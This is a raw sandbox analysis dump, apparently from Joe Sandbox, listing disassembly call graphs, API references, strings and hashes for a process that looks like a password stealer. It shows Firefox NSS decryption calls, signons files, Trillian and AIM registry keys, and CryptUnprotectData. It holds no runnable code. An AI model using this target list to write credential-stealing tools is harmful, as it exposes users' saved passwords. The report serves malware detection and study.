                                                                                                                                              control_flow_graph 107 410c4c-410c87 memset call 405ec5 110 410d64-410d6e 107->110 111 410c8d-410cda GetCurrentDirectoryA SetCurrentDirectoryA memset strlen * 2 107->111 112 410cf9-410cfb 111->112 113 410cdc-410cf7 call 406b4b 111->113 115 410d01-410d15 LoadLibraryExA 112->115 113->115 115->110 117 410d17-410d61 115->117 117->110
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00410C6D
                                                                                                                                                • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                                                                • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                                                                • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                                                                • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                              • memset.MSVCRT ref: 00410CB4
                                                                                                                                              • strlen.MSVCRT ref: 00410CBE
                                                                                                                                              • strlen.MSVCRT ref: 00410CCC
                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                                                              • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                              • API String ID: 2734314261-3659000792
                                                                                                                                              • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                              • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                                                                                                              • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                              • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 124 4064fb-40651b call 410c4c 127 406521-406555 memset call 406958 124->127 128 4066d9-4066e0 124->128 131 406563 127->131 132 406557-406561 127->132 133 406566-406568 131->133 132->133 135 4066d4 call 410d6f 133->135 136 40656e-4065d3 memset * 3 strlen * 2 133->136 135->128 137 4065d5-4065e6 call 406b4b 136->137 138 4065e8 136->138 141 4065ef-40660c strlen * 2 137->141 138->141 143 406621 141->143 144 40660e-40661f call 406b4b 141->144 146 406628-406645 strlen * 2 143->146 144->146 148 406647-406658 call 406b4b 146->148 149 40665a 146->149 151 406661-406670 call 4069d3 148->151 149->151 155 406681-406690 call 4069d3 151->155 156 406672-40667c call 4062db 151->156 160 4066a1-4066b0 call 4069d3 155->160 161 406692-40669c call 4062db 155->161 156->155 165 4066c1-4066d0 160->165 166 4066b2-4066bc call 4062db 160->166 161->160 165->135 168 4066d2 165->168 166->165 168->135
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                                                                • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                                                                • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                                                                • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                                                                • Part of subcall function 00410C4C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                              • memset.MSVCRT ref: 00406537
                                                                                                                                                • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                              • memset.MSVCRT ref: 0040657E
                                                                                                                                              • memset.MSVCRT ref: 00406596
                                                                                                                                              • memset.MSVCRT ref: 004065AE
                                                                                                                                              • strlen.MSVCRT ref: 004065B9
                                                                                                                                              • strlen.MSVCRT ref: 004065C7
                                                                                                                                              • strlen.MSVCRT ref: 004065F2
                                                                                                                                              • strlen.MSVCRT ref: 00406600
                                                                                                                                              • strlen.MSVCRT ref: 0040662B
                                                                                                                                              • strlen.MSVCRT ref: 00406639
                                                                                                                                                • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                                                                • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                                                                • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                                                                • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                                                                • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                                                                • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                                                                • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
                                                                                                                                                • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memsetstrlen$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                                                              • String ID: signons.txt$signons2.txt$signons3.txt
                                                                                                                                              • API String ID: 467111709-561706229
                                                                                                                                              • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                              • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                                                                                                                              • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                              • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 394 404d7a-404da3 LoadLibraryA 395 404da5-404db3 394->395 396 404dcd-404dd5 394->396 400 404db5-404db9 395->400 401 404dbe-404dc7 FreeLibrary 395->401 399 404dd6-404ddb 396->399 403 404df4-404df8 399->403 404 404ddd-404df3 MessageBoxA 399->404 405 404dbc 400->405 401->396 402 404dc9-404dcb 401->402 402->399 405->401
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                                                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoadMessage
                                                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                              • API String ID: 3897320386-317687271
                                                                                                                                              • Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                                                                                                                              • Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
                                                                                                                                              • Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                                                                                                                              • Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 406 4039a8-403a0f call 40d339 call 40d725 414 403a14-403a47 memset sprintf 406->414 415 403a49-403a6a call 40d362 * 2 _strcmpi 414->415 416 403a7c-403aa4 call 40d362 * 2 call 411ec1 414->416 415->416 425 403a6c-403a7a 415->425 426 403aa7-403aab 416->426 425->426 426->414 427 403ab1-403ab3 426->427
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcmpimemsetsprintf
                                                                                                                                              • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
                                                                                                                                              • API String ID: 1148023869-3238971583
                                                                                                                                              • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                                                                                                                              • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
                                                                                                                                              • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                                                                                                                              • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040FC6B
                                                                                                                                              • memset.MSVCRT ref: 0040FC82
                                                                                                                                                • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                              • _mbscat.MSVCRT ref: 0040FCAD
                                                                                                                                                • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                                                                                                                • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                              • _mbscat.MSVCRT ref: 0040FCD5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                              • API String ID: 748118687-1174173950
                                                                                                                                              • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                              • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                                                                                                                              • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                              • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                              • RegCloseKey.KERNEL32(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                                                                                                                              • _mbscat.MSVCRT ref: 00412188
                                                                                                                                                • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                              Strings
                                                                                                                                              • :\Program Files, xrefs: 0041217E
                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                                                                                                                              • ProgramFilesDir, xrefs: 00412150
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                                                                                                                              • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                              • API String ID: 3464146404-1099425022
                                                                                                                                              • Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                                                                                                                              • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                                                                                                                              • Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                                                                                                                              • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040733E: free.MSVCRT ref: 00407341
                                                                                                                                                • Part of subcall function 0040733E: free.MSVCRT ref: 00407349
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
                                                                                                                                              • _wcslwr.MSVCRT ref: 0040866E
                                                                                                                                              • wcslen.MSVCRT ref: 0040868B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$ByteCharMultiWide_wcslwrwcslen
                                                                                                                                              • String ID: /$/
                                                                                                                                              • API String ID: 4190021058-2523464752
                                                                                                                                              • Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                                                                                                                              • Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
                                                                                                                                              • Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                                                                                                                              • Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00411CB8
                                                                                                                                                • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                                                                • Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                                                              • memset.MSVCRT ref: 00411CF4
                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3143880245-0
                                                                                                                                              • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                              • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                                                                                                                              • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                              • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                              • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                              • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                                                                                                                              • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                              • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                              • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoad
                                                                                                                                              • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                              • API String ID: 534179979-1827663648
                                                                                                                                              • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                              • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                                                                                                                              • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                              • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040D959
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                                                                                                                                • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                                                                                                                                • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                                                                                                                                • Part of subcall function 0040D794: atoi.MSVCRT(?), ref: 0040D840
                                                                                                                                                • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                                                                                                                                • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?), ref: 0040D8B3
                                                                                                                                                • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?,?,?), ref: 0040D8C6
                                                                                                                                                • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2578913611-0
                                                                                                                                              • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                              • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                                                                                                                              • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                              • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                                                                                                                              APIs
                                                                                                                                              • malloc.MSVCRT ref: 0040699E
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004040EC,00000001,?,?,00000000,004038B8,?), ref: 004069B6
                                                                                                                                              • free.MSVCRT ref: 004069BF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: freemallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3056473165-0
                                                                                                                                              • Opcode ID: 7e4423998a5bf6bfb607acc7ce6a47bafa0b80d87e5f9d0a99af9475c24ad546
                                                                                                                                              • Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
                                                                                                                                              • Opcode Fuzzy Hash: 7e4423998a5bf6bfb607acc7ce6a47bafa0b80d87e5f9d0a99af9475c24ad546
                                                                                                                                              • Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                              • Instruction ID: 043642bf5cdc1de150e3446c738409664b5144c0223cf5edf213a9aa475217cd
                                                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                              • Instruction Fuzzy Hash: 8621E7311493416FEB218B745C017E6BBD8ABA7374F19469BD044CB283D26D98C693AE
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcmpi
                                                                                                                                              • String ID: /stext
                                                                                                                                              • API String ID: 1439213657-3817206916
                                                                                                                                              • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                                                                                                                              • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
                                                                                                                                              • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                                                                                                                              • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                              • Instruction ID: 25f2d81c04f4c45cc56d7cc0e98a54f4dee55ba3048ec5225fe48b17b8cda6c2
                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                              • Instruction Fuzzy Hash: 9101DB3058570179AB2166754C02AFBAF987AE3364F18074BB05497293CA5C89C683BD
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?,004066D9), ref: 00410D78
                                                                                                                                              • FreeLibrary.KERNELBASE(?), ref: 00410D80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectoryFreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2760881011-0
                                                                                                                                              • Opcode ID: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                              • Instruction ID: c686a64e774c0d910729c20308bd6d7dac36cbeeda648e68b024901bbde96cda
                                                                                                                                              • Opcode Fuzzy Hash: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                              • Instruction Fuzzy Hash: 8DC00239000A01DFD7219FA0E808BE5BBF4BF48342FA8496DE1C581064E7799594CF48
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040D9E1
                                                                                                                                              • memset.MSVCRT ref: 0040D9F8
                                                                                                                                                • Part of subcall function 00413735: memset.MSVCRT ref: 00413757
                                                                                                                                                • Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                                                                                                                                • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$Closememcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1317463181-0
                                                                                                                                              • Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                                                                                                                              • Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
